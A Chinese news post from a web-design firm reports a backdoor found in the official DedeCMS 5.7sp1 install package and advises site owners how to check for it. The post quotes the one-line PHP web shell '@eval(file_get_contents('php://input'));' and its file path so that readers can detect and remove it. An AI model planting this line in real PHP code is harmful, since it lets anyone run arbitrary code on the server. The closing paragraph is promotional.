番禺网站建设：近日到处传遍织梦内容管理系统（DedeCMS）遭乌云漏洞平台曝光称，DedeCMS 5.7sp1官方安装包被黑客植入后门。经360安全检测平台检测，该后门确实曾一度出现在织梦官网版本中。所以，360公司于当天紧急推出了DedeCMS后门检测服务，并已对大批中招网站发出邮件报警。

　　 360网站安全检测平台服务网址：http://webscan.360.cn


　　 据了解，DedeCMS被很多无自主开发后台能力的网站建设公司使用，广泛应用于很多企业网站、政府网站、高校网站及个人网站上，是国内用户量最大的PHP类CMS系统。番禺网站建设分析发现，此次DedeCMS曝出的后门名为“一句话后门”，其恶意代码存在于DedeCMS购物车类文件中，凡是调用该购物车类的文件均会触发后门，从而导致整个网站甚至服务器遭黑客进一步控制。

　　 360建议，使用DedeCMS的网站站长应立刻检测include/shopcar.class.php文件中是否存在后门代码“@eval(file_get_contents('php://input'));”，如存在应将其删除，如不存在则证明没有该“一句话后门”。

　　 作为开源软件，DedeCMS此次曝出后门并非个例。因为在国际上，Linux等多款著名的开源软件也曾遭黑客植入后门。不过，乌云漏洞平台公开的织梦官方邮件显示，织梦开发团队否认了产品曾被植入后门，但其官网上的DedeCMS版本在3月21日中午悄然进行了修改。

    此次事件对于于小型企业的网站开发影响很大，众多了解此系统的网站建设公司也忙于对自己系统的升级与改进，对于这些开源程序，代码在安全性上面受到互联网的监控，程序爆光面广，一旦被细心的黑客发现漏洞所在，所带来的问题将是广泛的。所以，对于此类CMS系统，番禺网站建设建议使用自主开发的后台管理系统，当然，并且所有网站建设公司有此能力。

编辑：番禺网站建设 http://www.py162.com